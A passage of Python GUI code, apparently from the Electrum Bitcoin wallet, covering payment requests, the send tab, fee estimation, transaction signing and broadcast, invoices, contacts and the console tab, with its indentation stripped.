alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
